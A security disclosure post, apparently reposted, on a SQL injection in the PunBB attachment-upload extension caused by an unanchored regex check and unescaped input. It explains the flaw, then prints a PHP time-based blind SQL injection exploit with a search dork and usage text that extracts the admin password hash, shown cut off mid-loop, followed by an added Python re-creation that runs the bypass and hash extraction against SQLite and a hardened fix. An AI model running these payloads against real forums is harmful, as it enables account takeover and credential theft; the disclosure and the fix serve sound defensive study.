Author: 手机用户2502853217 | Source: Internet | 2017-11-12 01:52
SQL injection in the official PunBB attachment-upload extension
Author: Ryat
if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
    {
        ...
        'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \''.$_GET['secure_str'].'\''
Fairly obvious: a misuse of the regular expression and of preg_match(). The pattern ~(\d+)f(\d+)~ is not anchored, so preg_match() succeeds on any string that merely contains "digits, f, digits" somewhere in it, and the code then concatenates the raw, unescaped $_GET['secure_str'] into the WHERE clause instead of the validated $match value. An input such as 1f1' AND ... therefore passes the check and lands verbatim in the query, which is a SQL injection through $_GET['secure_str'].
There is another injection in pun_list_attach.php as well, but it needs admin privileges; anyone interested can look at it themselves, that one is even more obvious :)
Finally, a PoC-grade exploit; don't ask me about the actual effect or how to use it...
#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Blind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http:
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

// table prefix of the target installation
$pre = 'pun_';

// BENCHMARK() iterations for the "guess is right" branch, and the response-time
// threshold used to tell a slow (hit) reply from a fast (miss) one
$benchmark = 200000000;
$timeout = 10;

echo "Plz Waiting...\nPassword:\n";

$j = 1;
$pass = '';

// candidate byte values: 0 (end of string), '0'-'9' and 'a'-'z'
$hash[0] = 0;
$hash = array_merge($hash, range(48, 57));
$hash = array_merge($hash, range(97, 122));

// recover the 40-character password hash of the first group_id=1 (admin) user one
// byte at a time: the "1f1'" prefix satisfies the unanchored (\d+)f(\d+) check, and
// the injected IF() makes the server spin in BENCHMARK() only when byte $j equals $i
while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            // the listing reproduced on this page ends here: send() and the
            // response-time check that appends the recovered byte to $pass are not shown
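The following is an added example, not code from the page or from the PunBB extension, that re-creates the two things discussed above in one runnable piece: the unanchored-regex check plus raw string concatenation from the vulnerable snippet (and its hardened form), and the byte-at-a-time hash extraction that the exploit listing performs. It runs against an in-memory SQLite stand-in, so the table names pun_users / pun_attach_files, the columns, the sample rows and the admin hash are all constructed for illustration and are not the real PunBB schema. Because SQLite has no BENCHMARK(), the extraction here is boolean-based (the row comes back only when the guess is right) rather than time-based, and it ends the injected clause with a "--" comment instead of MySQL's "#".

```python
import re
import sqlite3

# Constructed data: a 40-hex-char SHA1-style hash standing in for the admin's
# stored password hash (it is sha1("password"); the value itself does not matter).
ADMIN_HASH = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
HEX = "0123456789abcdef"
SECURE_STR_RE = r"(\d+)f(\d+)"   # the extension's pattern, minus the ~ delimiters


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the users table and the extension's file table
    (constructed, minimal columns; not the real PunBB schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE pun_users (id INTEGER, group_id INTEGER, username TEXT, password TEXT);
        INSERT INTO pun_users VALUES (2, 1, 'admin', '{ADMIN_HASH}');
        CREATE TABLE pun_attach_files (id INTEGER, secure_str TEXT, filename TEXT);
        INSERT INTO pun_attach_files VALUES (1, '2f7', 'secret.pdf');
    """)
    return db


def fetch_attach_vulnerable(db, attach_item: int, secure_str: str):
    """Same shape as the extension's code: re.search is an unanchored
    preg_match, and the RAW input (not the match) is glued into the WHERE clause."""
    if not re.search(SECURE_STR_RE, secure_str):
        return None
    sql = ("SELECT filename FROM pun_attach_files "
           "WHERE id = %d AND secure_str = '%s'" % (attach_item, secure_str))
    return db.execute(sql).fetchone()


def fetch_attach_hardened(db, attach_item: int, secure_str: str):
    """Fix: the whole value must match the pattern (fullmatch, i.e. ^...$),
    and the validated value reaches the query only as a bound parameter."""
    m = re.fullmatch(SECURE_STR_RE, secure_str)
    if m is None:
        return None
    return db.execute(
        "SELECT filename FROM pun_attach_files WHERE id = ? AND secure_str = ?",
        (attach_item, m.group(0)),
    ).fetchone()


def extract_admin_hash(db, length: int = 40) -> str:
    """Blind extraction through the vulnerable path, one character position at
    a time. The '1f1' prefix satisfies the unanchored check; the injected OR
    makes the row come back exactly when the guessed character is right."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            payload = (
                "1f1' OR (substr((SELECT password FROM pun_users "
                "WHERE group_id = 1 LIMIT 1), %d, 1) = '%s') -- " % (pos, ch)
            )
            if fetch_attach_vulnerable(db, 1, payload) is not None:
                recovered += ch
                break
        else:
            raise RuntimeError("no candidate matched at position %d" % pos)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legit:   ", fetch_attach_vulnerable(db, 1, "2f7"))
    print("bypass:  ", fetch_attach_vulnerable(db, 1, "1f1' OR 1=1 -- "))
    print("hardened:", fetch_attach_hardened(db, 1, "1f1' OR 1=1 -- "))
    print("admin hash:", extract_admin_hash(db))
```

The hardened version closes both holes at once: anchoring the pattern rejects anything with extra characters around the token, and binding the value as a parameter means that even a token which somehow passed validation could not change the query's structure. Either change alone would have stopped this particular payload, but only the parameter binding survives a future change to the pattern.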